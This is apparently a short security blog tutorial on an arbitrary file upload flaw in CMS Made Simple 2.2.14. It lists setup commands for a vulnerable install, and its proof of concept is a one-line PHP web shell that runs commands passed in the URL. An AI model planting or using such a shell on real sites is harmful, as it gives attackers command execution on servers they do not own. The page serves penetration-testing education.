Sponsored
CVE (POC)

CMS Made Simple 2.2.14 Exploit – Arbitrary File Upload

Hey Folks, In this tutorial we will show you the (POC) of cms made simple 2.2.14 which is vulnerable to arbitrary file upload vulnerability. This vulnerability allow an authenticated user to upload arbitrary file on the file manager.

About the Vulnerability

  • Exploit Author: Roel van Beurden
  • Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
  • Version: 2.2.14
  • Tested on: Ubuntu 18.04

Vulnerability Setup

wget http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
sudo unzip cmsms-2.2.14-install.zip -d /var/www/html/cmsms
sudo chmod -R 755 /var/www/html/cmsms/
sudo chown -R www-data:www-data /var/www/html/cmsms/
systemctl start apache2

Full Proof of Concept

cat > rce.phtml
<?php system($_GET['cmd']);?>
About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher.
Sponsored
Shubham Goyal

A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.

Recent Posts

How to Connect Kali Linux MCP with Claude Code

This guide explains how to integrate MCP (Model Context Protocol) with Claude using Kali Linux.…

2 months ago

Gau (GetAllUrls) – Find Known and Hidden URL

The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…

1 year ago

Jsluicepp – Burp Extension for JS Secrets – BugBountyTip

Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…

2 years ago

Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…

2 years ago

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

2 years ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

3 years ago
Sponsored

This website uses cookies.